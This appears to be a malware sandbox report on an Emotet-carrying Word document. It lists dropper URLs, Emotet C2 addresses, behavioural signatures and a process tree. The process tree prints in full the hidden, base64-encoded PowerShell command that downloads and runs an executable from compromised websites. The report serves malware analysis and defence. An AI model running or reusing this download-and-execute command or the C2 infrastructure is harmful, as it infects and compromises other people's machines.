Analysis

  • max time kernel
    140s
  • resource
    win7v191014
  • submitted
    17-12-2019 13:56

General

  • Target

    Docs_fbff465d66a0eb834b052719a27f5ab1.34

  • Sample

    191217-l96nd1vmds

  • SHA256

    6568a3a8206a6474f34f2f1d7a2951653070f60517ef2fb92c47d005bc4f7fbe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/

exe.dropper

http://jsd-id.com/wp-content/uploads/4ae3ep99933/

exe.dropper

http://18teens.xyz/wp-content/epewe862/

exe.dropper

http://www.fundzit.com/wp-admin/g05/

exe.dropper

http://wp.banyannaples.com/cgi-bin/97sq9667/

Extracted

Family

emotet

C2

152.170.108.99:443

99.252.27.6:80

93.148.252.90:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

80.85.87.122:8080

2.139.158.136:443

80.11.158.65:8080

79.31.85.103:80

77.55.211.77:8080

96.61.113.203:80

181.198.203.45:443

142.93.114.137:8080

186.15.83.52:8080

181.36.42.205:443

68.183.190.199:8080

159.203.204.126:8080

50.28.51.143:8080

46.101.212.195:8080

rsa_pubkey.plain

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 144 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Drops file in System32 directory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.34.doc"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    PID:2012
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000614;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1104
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:0000000000000614;0000000000000654;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1124
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:2004
    • C:\Users\Admin\67.exe
      "C:\Users\Admin\67.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:2076
      • C:\Users\Admin\67.exe
        --4e61eeeb
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2100
  • C:\Windows\SysWOW64\acquireshades.exe
    "C:\Windows\SysWOW64\acquireshades.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:2156
    • C:\Windows\SysWOW64\acquireshades.exe
      --2f227d2
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      PID:2172

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2012-0-0x00000000061D0000-0x00000000061D4000-memory.dmp

    Filesize

    16KB

  • memory/2012-2-0x00000000094F0000-0x00000000094F4000-memory.dmp

    Filesize

    16KB

  • memory/2012-1-0x0000000006317000-0x000000000631B000-memory.dmp

    Filesize

    16KB

  • memory/2076-9-0x0000000000240000-0x0000000000257000-memory.dmp

    Filesize

    92KB

  • memory/2100-12-0x0000000000360000-0x0000000000377000-memory.dmp

    Filesize

    92KB

  • memory/2100-13-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/2156-15-0x0000000000280000-0x0000000000297000-memory.dmp

    Filesize

    92KB

  • memory/2172-17-0x00000000002D0000-0x00000000002E7000-memory.dmp

    Filesize

    92KB

  • memory/2172-18-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB